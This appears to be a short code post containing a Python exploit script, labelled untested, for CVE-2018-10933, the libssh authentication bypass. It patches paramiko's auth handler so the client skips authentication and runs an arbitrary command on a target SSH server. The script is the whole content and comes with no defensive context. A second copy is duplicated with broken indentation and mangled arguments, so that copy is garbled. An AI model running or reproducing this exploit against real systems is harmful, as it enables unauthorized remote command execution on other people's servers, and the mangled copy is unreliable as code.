ktwombley · October 17, 2018 16:09
diff --git a/CVE-2018-10933-test b/CVE-2018-10933-test
 #!/usr/bin/env python
 # Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
 # untested CVE-2018-10933 

 import sys, paramiko
 import logging

 username = sys.argv[1]
 hostname = sys.argv[2]
 command = sys.argv[3]

 new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[
        paramiko.common.MSG_USERAUTH_SUCCESS]

 def auth_accept(*args, **kwargs):
    return new_auth_accept(*args, **kwargs)

 paramiko.auth_handler.AuthHandler._handler_table.update({
    paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,
 })

 port = 22
 try:
    logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.WarningPolicy)
    client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
    stdin, stdout, stderr = client.exec_command(command)
    print stdout.read(),
 finally:
    client.close()
	#!/usr/bin/env python
	# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
	# untested CVE-2018-10933

	import sys, paramiko
	import logging

	username = sys.argv[1]
	hostname = sys.argv[2]
	command = sys.argv[3]

	new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[
	paramiko.common.MSG_USERAUTH_SUCCESS]

	def auth_accept(args, *kwargs):
	return new_auth_accept(args, *kwargs)

	paramiko.auth_handler.AuthHandler._handler_table.update({
	paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,
	})

	port = 22
	try:
	logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
	client = paramiko.SSHClient()
	client.set_missing_host_key_policy(paramiko.WarningPolicy)
	client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
	stdin, stdout, stderr = client.exec_command(command)
	print stdout.read(),
	finally:
	client.close()